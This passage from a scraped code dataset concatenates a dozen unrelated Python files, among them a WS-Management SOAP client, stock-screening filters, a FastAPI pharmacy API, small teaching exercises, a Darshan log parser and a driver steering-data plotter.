debug\n self.showxml = showxml\n\n def etree_to_dict(self, t):\n d = {t.tag : map(self.etree_to_dict, t.iterchildren())}\n d.update(('@' + k, v) for k, v in t.attrib.items())\n d['text'] = t.text\n return d\n\n def request(self, doc = None, params = {}):\n '''\n Send a request to the target and return the response\n\n '''\n params['uuid'] = uuid.uuid4()\n if enumerate:\n doc = doc % params\n else:\n doc = doc % params\n if self.showxml:\n print(\"===== Request =====\")\n print(doc)\n print(\"===================\")\n for _ in range(wsmanData.CONNECT_RETRIES + 1):\n try:\n if self.debug:\n print(\"Connecting to %s\" % (self.target,))\n resp = requests.post(\n self.target,\n timeout = (0.1, 5),\n headers = {'content-type': 'application/soap+xml;charset=UTF-8'},\n auth = requests.auth.HTTPDigestAuth(self.username, self.password),\n data = doc,\n allow_redirects = False,\n )\n if self.showxml:\n print(\"===== Response =====\")\n print(resp.content)\n print(\"====================\")\n resp.raise_for_status()\n return WryDict.WryDict.from_xml(resp.content)\n except:\n if self.debug:\n print(\"Failed, retrying\")\n sleep(wsmanData.CONNECT_DELAY)\n\n def get(self, setting = '', **kwargs):\n '''\n Send a get request and return the result\n\n @param setting: the setting to get the value of (None for all in this resources)\n '''\n extraHeader = ''\n if 'headerSelector' in kwargs and 'headerSelectorType' in kwargs:\n extraHeader = '%(headerSelector)s' % kwargs\n params = {\n 'uri': self.target,\n 'actionUri': wsmanData.ACTIONS_URIS['get'],\n 'resourceUri': self.resourceUri,\n 'setting': setting,\n 'extraHeader': extraHeader,\n 'body': self.resource_methods['get']\n }\n response = self.request(doc = wsmanData.WS_ENVELOPE, params = params)\n if len(setting) > 0:\n response = response[self.resourceId][setting]\n return response\n\n def put(self, **kwargs):\n '''\n Get the current values, fill in new values and put back\n\n @param **kwargs: zero or more settings to put back to the wsman server\n '''\n current = self.get()\n for k, v in kwargs.items():\n current[self.resourceId][k] = v\n params = {\n 'uri': self.target,\n 'actionUri': wsmanData.ACTIONS_URIS['put'],\n 'resourceUri': self.resourceUri,\n 'setting': '',\n 'extraHeader': '',\n 'body': current.to_xml\n }\n return self.request(doc = wsmanData.WS_ENVELOPE, params = params)\n\n# def delete(self, **kwargs):\n# '''\n# Delete an instance\n# '''\n# params = {\n# 'uri': self.target,\n# 'actionUri': ACTIONS_URIS['delete'],\n# 'resourceUri': self.resourceUri,\n# 'setting': '',\n# 'extraHeader': '',\n# 'body': self.resource_methods['delete'] % kwargs\n# }\n# return self.request(doc = WS_ENVELOPE, params = params)\n#\n# def Create(self, **kwargs):\n# '''\n# Create an instance\n# '''\n# params = {\n# 'uri': self.target,\n# 'actionUri': ACTIONS_URIS['create'],\n# 'resourceUri': self.resourceUri,\n# 'setting': '',\n# 'extraHeader': '',\n# 'body': self.resource_methods['create'] % kwargs\n# }\n# return self.request(doc = WS_ENVELOPE, params = params)\n\n def enumerate(self, **kwargs):\n '''\n Return all instances of this Resource\n '''\n params = {\n 'uri': self.target,\n 'actionUri': wsmanData.ACTIONS_URIS['enumerate'],\n 'resourceUri': self.resourceUri,\n 'setting': '',\n 'extraHeader': '',\n 'body': self.resource_methods['enumerate'] % kwargs\n }\n enum_response = self.request(doc = wsmanData.WS_ENUM_ENVELOPE, params = params)\n params['enumctx'] = enum_response['EnumerateResponse']['EnumerationContext']\n params['actionUri'] = wsmanData.ACTIONS_URIS['pull']\n output = WryDict.WryDict({self.resourceId:[]})\n while params['enumctx']:\n data = self.request(doc = wsmanData.WS_PULL_ENVELOPE, params = params)\n if 'EnumerationContext' not in data['PullResponse']:\n params['enumctx'] = None\n output[self.resourceId].append(data['PullResponse']['Items'][self.resourceId])\n return output\n\n def invoke(self, method, **kwargs):\n '''\n Call a method and return the result\n\n @param method: the method name to call\n '''\n if method not in self.resource_methods:\n raise Exception(\"Method '%s' not defined\" % method)\n extraHeader = ''\n if 'headerSelector' in kwargs and 'headerSelectorType' in kwargs:\n extraHeader = '%(headerSelector)s' % kwargs\n params = {\n 'uri': self.target,\n 'actionUri': self.resourceUri + \"/\" + method,\n 'resourceUri': self.resourceUri,\n 'setting': '',\n 'extraHeader': extraHeader,\n 'body': self.resource_methods[method] % kwargs\n }\n return self.request(doc = wsmanData.WS_ENVELOPE, params = params)\n\n","repo_name":"ocadotechnology/wry","sub_path":"wry/wsmanResource.py","file_name":"wsmanResource.py","file_ext":"py","file_size_in_byte":7820,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"2897347219","text":"#! /usr/bin/env python\n# -*- coding:utf8 -*-\n\n\"\"\"\n过滤器的参数都是动态参数,所以应用场景只是在选股的时候,\n而不能用于模型训练,选股需要过滤的是原始数据而不是选择结果,\n获取数据集最后一天的数据进行过滤计算\n\"\"\"\n\nfrom abc import ABCMeta, abstractclassmethod\nimport pandas as pd\n\nimport constants\nfrom datasource import TushareDatasource\nfrom persistence import DaoMysqlImpl, FileUtils, create_session, SectionStockMapping\nfrom tools import create_instance, to_params\n\nclass Filter(metaclass = ABCMeta):\n \n def __init__(self, param):\n self._param = param\n \n @abstractclassmethod\n def filter(self, data):\n pass\n \n# 价格过滤\nclass PriceFilter(Filter):\n \n def filter(self, data):\n result = data.iloc[len(data) - 1]['close'] < self._param \n if (not result):\n print(\"stock: \" + data.iloc[len(data) - 1][\"ts_code\"] + \"'s close price: \" + str(data.iloc[len(data) - 1]['close']) + \" over the price filter threshold and will be filtered\")\n return result\n \n# ST标识过滤\nclass STFilter(Filter):\n \n def __init__(self):\n persistence = DaoMysqlImpl()\n static_stock_list = persistence.select(\"select ts_code, name from static_stock_list\")\n self._static_stock_list = pd.DataFrame(static_stock_list, columns=['ts_code','name'])\n \n def filter(self, data):\n ts_code = data.iloc[len(data) - 1]['ts_code']\n if (len(self._static_stock_list[self._static_stock_list['ts_code'] == ts_code]) == 0):\n raise Exception(\"Stock {} not found in static_stock_list, need to be updated\".format(ts_code))\n name = self._static_stock_list[self._static_stock_list['ts_code'] == ts_code]['name'].iloc[0]\n result = name.find('ST') == -1\n if (not result):\n print(\"stock: \" + ts_code + \" is ST stock and will be filterd\")\n return result\n \n# 市盈率过滤\nclass PERatioFilter(Filter):\n \n def __init__(self, param, trade_date):\n self._param = param\n datasource = TushareDatasource()\n self._indicator_data = datasource.daily_indicator(trade_date=trade_date)\n print(self._indicator_data)\n \n def filter(self, data):\n ts_code = data.iloc[len(data) - 1]['ts_code']\n result = True\n try:\n if (len(self._indicator_data) > 0 and not pd.isnull(self._indicator_data[self._indicator_data['ts_code'] == ts_code]['pe'].iloc[0])):\n result = self._indicator_data[self._indicator_data['ts_code'] == ts_code]['pe'].iloc[0] < self._param\n else:\n #获取不到市盈率,有可能是在亏损 \n result = False\n if (not result):\n print(\"stock: \" + ts_code + \"'s pe: \" + str(self._indicator_data[self._indicator_data['ts_code'] == ts_code]['pe'].iloc[0]) + \" over the pe filter threshold and will be filtered\")\n except Exception:\n #停牌\n result = False\n return result\n \n# 次新股过滤\nclass NewStockFilter(Filter):\n \n def __init__(self, param):\n self._param = param\n \n def filter(self, data):\n return len(data) > int(self._param)\n \n# 板块过滤\nclass SectionFilter(Filter):\n \n def __init__(self, params):\n session = create_session()\n section_stocking_mapping_list = session.query(SectionStockMapping).filter(SectionStockMapping.section_code.in_(params)).all()\n self._stock_set = set(list(map(lambda item : item.ts_code, section_stocking_mapping_list)))\n \n def filter(self, data):\n stock = data.iloc[len(data) - 1]['ts_code']\n return stock in self._stock_set\n \n# 筛选\ndef filter_stock(filter_list, data):\n if (len(filter_list) == 0):\n return True\n for filter in filter_list:\n if (not filter.filter(data)):\n return False\n return True\n \ndef create_filter_list(filters=''):\n filter_list = []\n if filters == '':\n return filter_list\n filter_exp_list = filters.split('|')\n if len(filter_exp_list) > 0:\n for filter in filter_exp_list:\n filter_with_param = filter.split('_')\n if len(filter_with_param) > 1:\n filter_list.append(create_instance('filter', filter_with_param[0], to_params(filter_with_param[1])))\n else:\n filter_list.append(create_instance('filter', filter_with_param[0]))\n return filter_list\n\ndef to_params(str):\n if (str.find(\"[\") != -1 and str.find(\"]\") != -1):\n params = list(map(lambda str: type_conversion(str), str.split(\"-\")))\n return params\n else:\n return type_conversion(str)\n \ndef type_conversion(str):\n try:\n return int(str)\n except ValueError:\n try:\n return float(str)\n except ValueError:\n return str\n\nif __name__ == '__main__':\n data = FileUtils.load(constants.DATA_PATH + '/stock/688667.SH.pkl')\n data1 = FileUtils.load(constants.DATA_PATH + '/stock/600671.SH.pkl')\n trade_date = data.iloc[len(data) - 1]['trade_date']\n filter_list = []\n filter_list.append(PriceFilter(200))\n filter_list.append(STFilter())\n filter_list.append(PERatioFilter(50, trade_date))\n filter_list.append(SectionFilter(['BK0481']))\n for filter in filter_list:\n print('aaaa' + str(filter.filter(data)))\n print('bbbb' + str(filter.filter(data1)))\n \n filter_list1 = create_filter_list('PriceFilter_200|STFilter|SectionFilter_[BK0481]')\n for filter in filter_list1:\n print('aaaa' + str(filter.filter(data)))\n print('bbbb' + str(filter.filter(data1)))\n ","repo_name":"finley007/Stock","sub_path":"finley/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":5710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"43276097792","text":"from fastapi import FastAPI, Depends, Response\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom Models import Databases\nfrom Controllers.EmployeeController import employee_routes\nfrom dotenv import load_dotenv\nfrom Controllers.ClientController import cliente_routes\nfrom Controllers.TransactionsController import transaction_routes\nfrom Controllers.ProductController import product_routes\nfrom Controllers.StoreController import store_routes\nfrom Controllers.ProviderController import provider_routes\nfrom Controllers.StockController import stock_routes\nfrom Requests.EmployeeRequest import EmployeeAuth\nfrom jwtFunctions import verify_cashier_access, verify_inventory_manager_access, verify_credentials, write_token\nfrom responseHelper import *\n\nuwuAPI = FastAPI(title=\"FarmaciauwuAPI\", description=\"API para mi POS\", version=\"2.0.0\")\nuwuAPI.include_router(employee_routes, prefix=\"/employee\")\nuwuAPI.include_router(cliente_routes, prefix=\"/client\", dependencies=[Depends(verify_cashier_access)])\nuwuAPI.include_router(transaction_routes, prefix=\"/transaction\")\nuwuAPI.include_router(product_routes, prefix=\"/product\")\nuwuAPI.include_router(store_routes, prefix=\"/store\")\nuwuAPI.include_router(provider_routes, prefix=\"/provider\", dependencies=[Depends(verify_inventory_manager_access)])\nuwuAPI.include_router(stock_routes, prefix=\"/stock\")\n\nuwuAPI.add_middleware(CORSMiddleware, allow_origins=['*'],\n allow_credentials=True,\n allow_methods=[\"GET\", \"PUT\", \"POST\", \"DELETE\"],\n allow_headers=[\"*\"], )\n\n\n@uwuAPI.on_event(\"startup\")\ndef startup():\n if Databases.maria.is_closed():\n Databases.maria.connect()\n\n\n@uwuAPI.on_event(\"shutdown\")\ndef shutdown():\n if not Databases.maria.is_closed():\n Databases.maria.close()\n\n\n@uwuAPI.post(\"/login\", responses={\n 200: set_custom_response(\"OK\", {\"message\": \"Login successful\", \"token\": \"token_uwu\"}),\n 400: set_custom_response(\"Bad request\", {\"detail\": {\"message\": \"Incorrect password\"}}),\n 404: set_404_response()\n}, tags=[\"Login\"])\nasync def login(user: EmployeeAuth, response: Response):\n info, pos = verify_credentials(user, True)\n token = write_token(info)\n response.set_cookie(key=\"token_c\", value=token, httponly=True)\n return {\"message\": \"Login successful\", \"token\": token, \"position\": pos}\n\n\n@uwuAPI.post(\"/logout\", tags=[\"Logout\"])\nasync def logout(response: Response):\n response.delete_cookie(key=\"token_c\")\n return {\"message\": \"Logout successful\"}\n\n\nload_dotenv()\n","repo_name":"FaridCG343/FarmaciauwuAPI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33711843214","text":"import pytest\nimport magma as m\nfrom mantle.coreir.LUT import LUT\nfrom magma.testing import check_files_equal\n\n\n@pytest.mark.skip(reason='Abort 6')\ndef test_coreir_lut():\n class Test(m.Circuit):\n name = \"test_coreir_lut3\"\n IO = [\"I\", m.In(m.Bits(3)), \"O\", Out(Bit)]\n @classmethod\n def definition(cls):\n lut3 = LUT(0xDE, 3)\n for i in range(3):\n m.wire(cls.I[i], getattr(lut3, \"I{}\".format(i)))\n m.wire(lut3.O, cls.O)\n\n m.compile(\"build/test_lut3\", Test, output=\"coreir\")\n assert check_files_equal(__file__,\n \"build/test_lut3.json\", \"gold/test_lut3.json\")\n","repo_name":"bbPeng98/DSE-framework-of-PRAD","sub_path":"MetaMapper/MetaMapper/src/mantle/tests/test_coreir/test_lut.py","file_name":"test_lut.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8222815545","text":"import operator\n\n\ndef main(binary_fn):\n\tprint(f\"binary function: {binary_fn}\\n\")\n\n\tright = 0\n\twhile True:\n\t\tsequence = get_sequence(right, binary_fn)\n\n\t\tif is_monotonic(sequence):\n\t\t\tprint(f\"right: {right}, monotonic sequence: {sequence}\\n\")\n\n\t\tright += 1\n\n\t\t# if right % 1000 == 0:\n\t\t# \tprint(right)\n\n\ndef get_sequence(right, binary_fn):\n\t\"\"\"\n\tThe sequence lengths. See the README for the full sequences.\n\t1 -> 0b001 -> 2 ** (0 + 1) -> 2\n\t2 -> 0b010 -> 2 ** (1 + 1) -> 4\n\t3 -> 0b011 -> 2 ** (1 + 1) -> 4\n\t4 -> 0b100 -> 2 ** (2 + 1) -> 8\n\t\"\"\"\n\tsequence = []\n\n\tfor left in range(2 ** (get_most_significant_bit_index(right) + 1)):\n\t\tsequence.append(binary_fn(left, right))\n\n\treturn sequence\n\n\ndef get_most_significant_bit_index(n):\n\t\"\"\"\n\tSee https://stackoverflow.com/a/4970859/13279557\n\t\"\"\"\n\ti = 0\n\n\tn >>= 1\n\twhile (n > 0):\n\t\ti += 1\n\t\tn >>= 1\n\n\treturn i\n\n\ndef is_monotonic(sequence):\n\tsequence_len = len(sequence)\n\n\tif sequence_len <= 1:\n\t\treturn True\n\n\tstart_slope_direction = None\n\n\tfor i in range(0, sequence_len - 1):\n\t\tslope_direction = get_slope_direction(sequence[i], sequence[i + 1])\n\n\t\tif start_slope_direction == None and slope_direction != 0:\n\t\t\tstart_slope_direction = slope_direction\n\t\telif slope_direction == -1 and start_slope_direction == 1:\n\t\t\treturn False\n\t\telif slope_direction == 1 and start_slope_direction == -1:\n\t\t\treturn False\n\n\treturn True\n\n\ndef get_slope_direction(a, b):\n\tn = b - a\n\n\tif n > 0:\n\t\treturn 1\n\telif n == 0:\n\t\treturn 0\n\telse:\n\t\treturn -1\n\n\nif __name__ == \"__main__\":\n\tbinary_fn = operator.and_\n\t# binary_fn = operator.or_\n\t# binary_fn = operator.xor\n\n\tmain(binary_fn)","repo_name":"MyNameIsTrez/Non-Monotonic-AND-Sequence","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28969811614","text":"\"\"\"\nasyncio.Queue\n\nasyncio提供了队列(Queue)对象,实现协程间的通信,与queue.Queue对于线程和\nmultiprocessing.Queue对于进程的意义相同。\n\n最经典的案例莫过于生产/消费模型。\n\"\"\"\n\nimport asyncio\nimport random\nimport logging\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s - %(levelname)s - %(message)s\"\n)\n\n\nasync def producer(q):\n for i in range(10):\n # simulate i/o operation\n await asyncio.sleep(random.randint(1,2))\n item = \"item(%d)\" % i\n await q.put(item)\n logging.info(\"produce %s\" % item)\n \n # indicate producing stop\n await q.put(None)\n\n\nasync def consumer(q):\n while True:\n item = await q.get()\n logging.info(\"consumer get %s\" % item)\n \n if item is None:\n break\n\n\nasync def main():\n q = asyncio.Queue()\n await asyncio.gather(*(\n producer(q), consumer(q)\n ))\n\n\nloop = asyncio.get_event_loop()\ntry:\n loop.run_until_complete(main())\nfinally:\n loop.close()\n","repo_name":"scofieldchen/learn-python","sub_path":"concurrency/async/asyncio_queue.py","file_name":"asyncio_queue.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27308561764","text":"\"\"\"\nThis Module implements time series models using R's tscount package\nvia the rpy2 library\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom rpy2.robjects import pandas2ri\npandas2ri.activate()\nfrom rpy2.robjects import r\nfrom rpy2.rlike.container import TaggedList\nfrom rpy2.robjects.packages import importr\nfrom infodenguepredict.data.infodengue import get_alerta_table\n\ndef build_model(data):\n model = tsglm(data.casos, model=TaggedList([52, 3], tags=['past_obs', 'past_mean']), distr='nbinom')\n return model\n\ndef plot_forecast(data, fcast):\n index = pd.date_range(start=data.index.max(), periods=len(fcast[3]) + 1, freq='W')[1:]\n forecast = pd.Series(fcast[3], index=index)\n lowerpi = pd.Series(fcast[4], index=index)\n upperpi = pd.Series(fcast[5], index=index)\n plt.plot(data.index, data.casos_est, color='b', alpha=0.5)\n plt.plot(forecast.index, forecast.values, color='red')\n plt.fill_between(forecast.index,\n lowerpi.values,\n upperpi.values,\n alpha=0.2, color='red')\n\n\nif __name__ == \"__main__\":\n data = get_alerta_table(3304557) # Nova Iguaçu: 3303609\n tscount = importr('tscount')\n tsglm = r('tsglm')\n\n\n\n model = build_model(data)\n print(r.summary(model))\n r.plot(model)\n # fcast = forecast.forecast(model, h=5, level=95.0)\n # print(fcast[3], fcast[4], fcast[5])\n # plot_forecast(data=data, fcast=fcast)\n # plt.show()\n\n\n\n\n","repo_name":"AlertaDengue/InfoDenguePredict","sub_path":"infodenguepredict/models/R_tscount.py","file_name":"R_tscount.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"28543139949","text":"decimal = eval(input('Enter a decimal value:'))\nbinary = ''\nwhile decimal != 0:\n \n binary = str(decimal%2)+binary\n decimal = decimal //2\n \n \n\nprint('The decimal value {} conver to binary is {}'.format(decimal,binary))","repo_name":"huai0216/python","sub_path":"week5/decimaltobinary.py","file_name":"decimaltobinary.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70550460081","text":"'''\nGiven a word, you need to judge whether the usage of capitals in it is right or not.\n\nWe define the usage of capitals in a word to be right when one of the following cases holds:\n\nAll letters in this word are capitals, like \"USA\".\nAll letters in this word are not capitals, like \"leetcode\".\nOnly the first letter in this word is capital, like \"Google\".\nOtherwise, we define that this word doesn't use capitals in a right way.\n \n\nExample 1:\n\nInput: \"USA\"\nOutput: True\n \n\nExample 2:\n\nInput: \"FlaG\"\nOutput: False\n'''\nclass Solution(object):\n def detectCapitalUse(self, word):\n \"\"\"\n :type word: str\n :rtype: bool\n \"\"\"\n follow_small = False\n follow_big = False\n if ord(word[0])>=ord('A') and ord(word[0])<=ord('Z'):\n for i in range(1,len(word)):\n if ord(word[i])>=ord('a'):\n follow_small = True\n if follow_big:\n return False\n if ord(word[i])<=ord('Z'):\n follow_big = True\n if follow_small:\n return False\n return True\n else:\n for i in range(1,len(word)):\n if ord(word[i])<=ord('Z'):\n return False\n return True\n \n \n \n","repo_name":"csrunner/leetcode","sub_path":"520_detect_capital.py","file_name":"520_detect_capital.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12458320074","text":"n = int(input(\"Cantidad docentes?\")) \n\ndicCategoria = {1:25000 , 2:30000 , 3:40000 , 4:45000 , 5:60000}\nlstDocentes = []\ntotalHonorarios= 0 \n\nfor i in range (1 , n+1): \n print(\"\\nDatos del docente #\" , i) \n datDocente = {} \n ced = input(\"Cedula?\") \n datDocente[\"ced\"] = ced\n datDocente[\"nombre\"] = input(\"Nombre: \") \n datDocente[\"categoria\"] = int(input(\"Categoria (1-5): \")) \n datDocente[\"horas_hab\"] = int(input(\"Horas laboradas: \")) \n datDocente[\"honorarios\"] = dicCategoria.get(datDocente[\"categoria\"] , 0) * datDocente[\"horas_hab\"] \n\n totalHonorarios += datDocente[\"honorarios\"]\n\n lstDocentes.append(datDocente)\n\n\n\nprint(\"\\n\\n\" , \"=\" *30) \nprint(\"INFORME\") \nprint(\"=\" *30) \nprint(\"NOMBRE\\t\\tHONORARIOS\") \nprint(\"=\" *30) \n\n\"\"\" for d in lstDocentes: \n print(f\"{d['nombre']}\\t\\t${d['honorarios']:,}\") \"\"\"\n\nfor i in range (len(lstDocentes)): \n print(f\"{lstDocentes[i]['nombre']}\\t\\t${lstDocentes[i]['honorarios']:,}\") \n\n\nprint(\"\\n\\n\",\"=\" *30) \nprint(f\"Total honorarios: {totalHonorarios:,}\") ","repo_name":"Serranomanuel/campuslandarchivos","sub_path":"11 diccionarios/inst-listado.py","file_name":"inst-listado.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8181392156","text":"# 주차타워 구현!\r\n# 조건: 1층 ~ 5층, 층별로 1대만 주차\r\n# 차량번호: 숫자 4자리\r\n# 기능:\r\n# 1) 차량 입고\r\n# 2) 차량 출고\r\n# 3) 차량 조회\r\n# 4) 프로그램 종료\r\n\r\n#설정\r\nmax_car = 5 # 최대 5대\r\ncar_cnt = 0 # 주차 대수 카운트\r\n\r\n#tower = []\r\n# 리스트 컴프리핸슨 기법!\r\n# 1.List Comprehension\r\ntower = [\"\" for i in range(max_car)]\r\n\r\n# 2.for + list.append()\r\n# tower = []\r\n# for i in range(max_car):\r\n# tower.append(\"\")\r\n #[\"\",\"\",\"\",\"\",\"\"]\r\nwhile True:\r\n print(\"=\"*50)\r\n print(\"== 주차 타워 시스템 ver1.1 ==\")\r\n print(\"=\" * 50)\r\n print(\"= 1.입고\")\r\n print(\"= 2.출고\")\r\n print(\"= 3.조회\")\r\n print(\"= 4.종료\")\r\n print(\"=\" * 50)\r\n\r\n while True:\r\n select_num = int(input(\">>번호: \"))\r\n if 4>=select_num >= 1:\r\n break\r\n else:\r\n print(\"MSG: 올바른 번호를 입력하세요.\")\r\n if select_num == 1: # 입고\r\n# 입고1.주차타워 공간 확인\r\n if car_cnt < max_car: #입고\r\n car_num = input(\">>입고: \")\r\n for i, car in enumerate(tower):\r\n if car == \"\":\r\n tower[i] = car_num\r\n car_cnt += 1\r\n break\r\n else:\r\n print(\"MSG: 입고 불가,다른 곳으로 가..\")\r\n elif select_num == 2: # 출고\r\n # 1.차량번호\r\n car_num = input(\">>출고: \") \r\n # 2.주차타워 check 차량번호\r\n if car_num in tower:\r\n for car in enumerate(tower):\r\n if car==car_num: #출고\r\n tower[i] = \"\"#타워에서 차량제거\r\n car_cnt -= 1 # 현재 주차대수 동기화\r\n break\r\n else:\r\n print(\"MSG: 해당 번호로 입고 된 차량이 없습니다.\")\r\n # 2-1. 있으면 -> 출고(tower 해당 차량 제거, car_cnt_-1)\r\n # 2-2. 없으면 -> \"입고 된 차량 x\"\r\n pass\r\n elif select_num == 3: # 조회\r\n for i in range(len(tower)-1, -1, -1):\r\n print(f\">{i+1}층 {tower[i]}\")\r\n elif select_num == 4: # 종료\r\n print(\"MSG: 프로그램을 종료합니다.\")\r\n exit()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"pilyunsun/Python_Basic","sub_path":"project_paking_tower/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5225332255","text":"#!/usr/local/bin/python3\n\nimport os\nimport subprocess\n\ndarshan_log_dir = \"/Users/ddai/Documents/test-data-sets/intrepid/2013\"\nfile_size_map_file = \"/Users/ddai/Documents/test-data-sets/processed.txt\"\nparsed_file_path = \"/tmp/1.txt\"\n\ng = os.walk(darshan_log_dir)\n\nfile_size_map = {}\nhelper_map = {}\n\nfor path, _, files in g:\n for file in files:\n if (not file.endswith(\"bz2\")):\n continue\n file_path = os.path.join(path, file)\n print (file_path)\n parsed_file_output = open(parsed_file_path, \"w\")\n command = \"./darshan-parser \" + file_path\n p = subprocess.Popen(command, shell=True, stdout=parsed_file_output).wait()\n parsed_file_output.close()\n\n input_log = open(parsed_file_path, \"r\")\n for line in input_log:\n if line.startswith(\"#\"):\n continue\n str = line.split()\n if (len(str) == 0):\n continue\n \n file_name_id = int(str[1])\n\n # if this file has not been visisted before, initialize its size as 0\n if not file_name_id in file_size_map.keys():\n file_size_map[file_name_id] = 0\n helper_map[file_name_id] = 0\n # CP_SIZE_AT_OPEN may be smaller than the recorded size!\n \n if (str[2] == \"CP_BYTES_WRITTEN\"): # index: 48\n helper_map[file_name_id] = int(str[3])\n\n if (str[2] == \"CP_SIZE_AT_OPEN\"): # index: 139\n size_at_open = int(str[3])\n new_file_size = size_at_open + helper_map[file_name_id]\n file_size_map[file_name_id] = max(file_size_map[file_name_id], new_file_size)\n \n input_log.close()\n\nwith open(file_size_map_file, 'w') as f:\n print(file_size_map, file=f) \n","repo_name":"DIR-LAB/lustreaging","sub_path":"parse-darshan-logs-intrepid.py","file_name":"parse-darshan-logs-intrepid.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71737945521","text":"import requests\r\nimport os\r\nfrom datetime import datetime\r\nimport matplotlib.pyplot as plt\r\n\r\n# Replace with your GitHub username and Personal Access Token\r\nusername = os.getenv('GH_USERNAME')\r\ntoken = os.getenv('GH_TOKEN')\r\n\r\n# API URL for the user's recent activity\r\napi_url = f'https://api.github.com/users/{username}/events/public'\r\n\r\nheaders = {\r\n 'Authorization': f'token {token}'\r\n}\r\n\r\ntry:\r\n response = requests.get(api_url, headers=headers)\r\n response.raise_for_status()\r\n events = response.json()\r\n\r\n # Initialize lists to store timestamps and event types\r\n timestamps = []\r\n event_types = []\r\n\r\n for event in events:\r\n created_at = event['created_at']\r\n timestamps.append(datetime.fromisoformat(created_at.replace('Z', '')))\r\n event_types.append(event['type'])\r\n\r\n # Create a list of events per day\r\n days = []\r\n for timestamp, event_type in zip(timestamps, event_types):\r\n day = timestamp.date()\r\n if not days or day != days[-1]:\r\n days.append(day)\r\n\r\n # Create a list of event counts per day\r\n event_counts = [event_types.count(event_type) for event_type in set(event_types)]\r\n\r\n # Create the activity chart\r\n plt.figure(figsize=(12, 6))\r\n plt.bar(days, event_counts, width=0.9)\r\n plt.xlabel('Date')\r\n plt.ylabel('Event Count')\r\n plt.title(f'GitHub Activity Chart for {username}')\r\n plt.xticks(rotation=45)\r\n plt.tight_layout()\r\n\r\n \r\n # Show the activity chart\r\n plt.show()\r\n\r\nexcept requests.exceptions.RequestException as e:\r\n print(f\"Error: {e}\")\r\n","repo_name":"Yantiomene/Github-stats","sub_path":"github_api_queries/get_draw_act.py","file_name":"get_draw_act.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"33680579956","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport random\n\nfrom Driver import Driver\nfrom Subject_Analysis import Subject_Analysis\n\nclass Data_plotter:\n def __init__(self, Alcoholic_data: pd.DataFrame, Non_Alcoholic_data: pd.DataFrame):\n \n self.subjects = [] # Create list of subjects' objects\n self.subjects_analysis = [] # Create list of subjects' analyses objects\n \n concat_data = pd.concat([Alcoholic_data, Non_Alcoholic_data],axis=0) \n IDs, IDs_order = np.unique(concat_data.driver, return_index=True)\n self.IDs = IDs[np.argsort(IDs_order)] # Gets the IDs sorted by location in concat data\n \n # Extract data for each subject (driver)\n for ind, ID in enumerate(self.IDs):\n driver_data = concat_data.query('driver == @ID')\n self.subjects.append(Driver(ID, driver_data)) \n self.subjects_analysis.append(Subject_Analysis(self.subjects[ind].Steering, \n self.subjects[ind].TimeStamp))\n \n # %% PLOTS \n def Plot_Steering_Statistics(self):\n # This function plots the descriptive statistics of drivers' steering wheel signals\n num_of_stats = len(self.subjects_analysis[0].steering_features) # Number of statistics to show\n keys_stats = list(self.subjects_analysis[0].steering_features.keys()) # description of each stat (feature)\n drivers_stats = np.zeros((len(self.subjects),num_of_stats)) # preallocation with zeros array\n drivers_alcohol_cc = []\n rows = 2\n cols = int(np.ceil(num_of_stats/rows))\n \n # Creating a matrix of features per subject (Rows = subjects, Columns = features)\n for ind, driver in enumerate(self.subjects):\n drivers_stats[ind,:] = np.array(list(self.subjects_analysis[ind].steering_features.values()))\n drivers_alcohol_cc.append(driver.Alcohol_cc) \n \n labels = [str(i) for i in drivers_alcohol_cc]\n \n fig0, ax = plt.subplots(rows, cols, figsize=(40,20))\n ax = ax.flatten()\n # Plot in barplot style - X axis: alcohol consumed (per subject), Y axis: feature value (per subject)\n for i, key in enumerate(keys_stats):\n \n ax[i].bar(range(len(labels)), drivers_stats[:,i], 0.5); \n ax[i].set_xticks(range(len(labels))); ax[i].set_xticklabels(labels)\n ax[i].set_xlabel('Alcohol consumed [cc]'); ax[i].set_ylabel(key); ax[i].set_title(key + '\\nSteering wheel per driver')\n \n # Add driver name to each column\n for j,name in enumerate(self.IDs):\n ax[i].text(j, drivers_stats[j,i], name, ha='center')\n \n fig0.suptitle(\"Time Domain: Steering's signal features\")\n fig0.show() \n \n def 